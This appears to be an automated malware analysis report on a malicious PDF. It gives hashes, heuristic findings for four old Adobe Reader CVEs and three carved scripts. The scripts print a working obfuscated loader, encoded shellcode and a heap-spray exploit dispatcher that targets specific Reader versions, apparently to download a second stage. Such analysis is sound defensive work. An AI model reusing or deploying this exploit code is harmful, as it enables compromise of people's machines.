Malicious PDF — malware analysis report

Static analysis result for SHA-256 22d16f7c7ef26acb…

MALICIOUS

PDF

32.7 KB Created: 2010-07-25 10:32:51 First seen: 2012-07-12
MD5: 233c42721ad578011d35a6762025613c SHA-1: cebd5fcc8b7c909a1f407bedf8207be767605eab SHA-256: 22d16f7c7ef26acb99c3eb9789451dabf645a79cb73405d17eb11555a7b58a18
448 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis identified embedded JavaScript, which is a common technique for exploiting PDF vulnerabilities or initiating malicious actions. The JavaScript stream is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x7FA2 585 bytes
SHA-256: 975ae9d913b5c9a3fb8ef0af7124f346b828d247095380918078303373d1fcc5
Preview script
First 1,000 lines of the extracted script
var a=function(){zd=(function(){return this;})();xf=new Date();var id='';var qst='e'+(parseInt(xf.getFullYear())-2)+'a'+id+'l';nkvh=zd[qst.replace('2008','v')];var rlk='';var id='';nkvh('va'+id+'r zlb=th'+id+'i'+id+'s');nkvh(''+id+' mqmu=Str'+id+'ing.f'+id+'romC'+id+'harCode');nr='pr'+id+'od'+id+'uc'+'er';var bjp=zlb[nr];mxyq=id;nkvh('va'+mxyq+'r n'+id+'r=['+bjp+mxyq+']');tpx=nr;tp='le'+id+'ng'+id+'th';hgh=parseInt(tpx[tp]);id=0;moyj=xf.getFullYear()/1005;var b=function(q){return parseInt(q/2);};while(id<hgh){rlk+=mqmu(tpx[b(id)+b(hgh)]-tpx[b(id)]);id+=2;}
nkvh(rlk);};a.call();
generic_stage_recovery_000.js deobfuscated-js generic stage recovery producer-halfdiff from raw PDF metadata at offset 0x0 3636 bytes
SHA-256: e290f709c3174e9b9a290457f4c5400ab7c5c48b6367ac040ae1ede6ebfc071d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%udf34%ue2aa%uc3fa%ue5e8%uffff%u36ff%uded3%udfdf%u5e81%u8333%udfde%u56df%u5238%ucf90%ub052%uee8b%u8804%u8c8e%u8c8c%u8c8c%u8c8c%u8c8a%ub78c%udedb%udfdf%u898a%ub78c%ub1b0%udfdf%uaab7%ub3ad%u8bb2%u51b7%ud191%u3733%udf97%udfdf%u378f%udfa3%udfdf%u0f20%u1b5c%ub7d7%u3090%uda90%u378f%udfb3%udfdf%u0f20%u1f5a%uc8aa%u8bb5%u2c86%ub775%u21ad%uc96c%uc237%udfdf%u8fdf%u8e37%udfdf%u20df%u8c0f%u21b5%u56b7%udeb0%u3762%udfd7%udfdf%u378f%udfe3%udfdf%u0f20%ueebf%ubb1f%u8f54%u54ef%ud38d%u8d54%u54cb%uf7ad%uc766%udfdf%ueedf%uee20%u731f%ubee3%udda3%ufff3%u101e%uded2%u3d18%u5e2f%u8420%u9563%u54b5%ucf9d%ucd54%u06aa%u9b56%uc3fb%u1cbe%u54bf%ufbb3%u54fb%ue39a%u8b54%ua7da%u35de%u9554%u54c7%uff85%u34de%ueb3c%u5496%u54eb%u31de%u20ee%u1fee%u7323%u1f5b%ud8ab%u101e%uded2%u3418%ue42b%ufba3%uaaf7%u543e%ufb85%u34de%u54b9%u94d3%u8554%udec3%u5434%u54db%u37de%u9b56%uc3fb%u1dbe%udfd7%u3037%u2021%ub720%uabab%ue5af%uf0f0%uefef%uefef%uefef%uf1e6%ub1b6%ubbf0%uaff1%uafb7%ub9e0%ueee2%uf9e9%ue2ba%udfec';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from raw PDF metadata at offset 0x0 3632 bytes
SHA-256: 70b88cfc8a2e35a6e1dfde13eb214ee633a5156b3f2a3ab42dd6bc068c8ec2de
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%udf34%ue2aa%uc3fa%ue5e8%uffff%u36ff%uded3%udfdf%u5e81%u8333%udfde%u56df%u5238%ucf90%ub052%uee8b%u8804%u8c8e%u8c8c%u8c8c%u8c8c%u8c8a%ub78c%udedb%udfdf%u898a%ub78c%ub1b0%udfdf%uaab7%ub3ad%u8bb2%u51b7%ud191%u3733%udf97%udfdf%u378f%udfa3%udfdf%u0f20%u1b5c%ub7d7%u3090%uda90%u378f%udfb3%udfdf%u0f20%u1f5a%uc8aa%u8bb5%u2c86%ub775%u21ad%uc96c%uc237%udfdf%u8fdf%u8e37%udfdf%u20df%u8c0f%u21b5%u56b7%udeb0%u3762%udfd7%udfdf%u378f%udfe3%udfdf%u0f20%ueebf%ubb1f%u8f54%u54ef%ud38d%u8d54%u54cb%uf7ad%uc766%udfdf%ueedf%uee20%u731f%ubee3%udda3%ufff3%u101e%uded2%u3d18%u5e2f%u8420%u9563%u54b5%ucf9d%ucd54%u06aa%u9b56%uc3fb%u1cbe%u54bf%ufbb3%u54fb%ue39a%u8b54%ua7da%u35de%u9554%u54c7%uff85%u34de%ueb3c%u5496%u54eb%u31de%u20ee%u1fee%u7323%u1f5b%ud8ab%u101e%uded2%u3418%ue42b%ufba3%uaaf7%u543e%ufb85%u34de%u54b9%u94d3%u8554%udec3%u5434%u54db%u37de%u9b56%uc3fb%u1dbe%udfd7%u3037%u2021%ub720%uabab%ue5af%uf0f0%uefef%uefef%uefef%uf1e6%ub1b6%ubbf0%uaff1%uafb7%ub9e0%ueee2%uf9e9%ue2ba%udfec';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("	");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.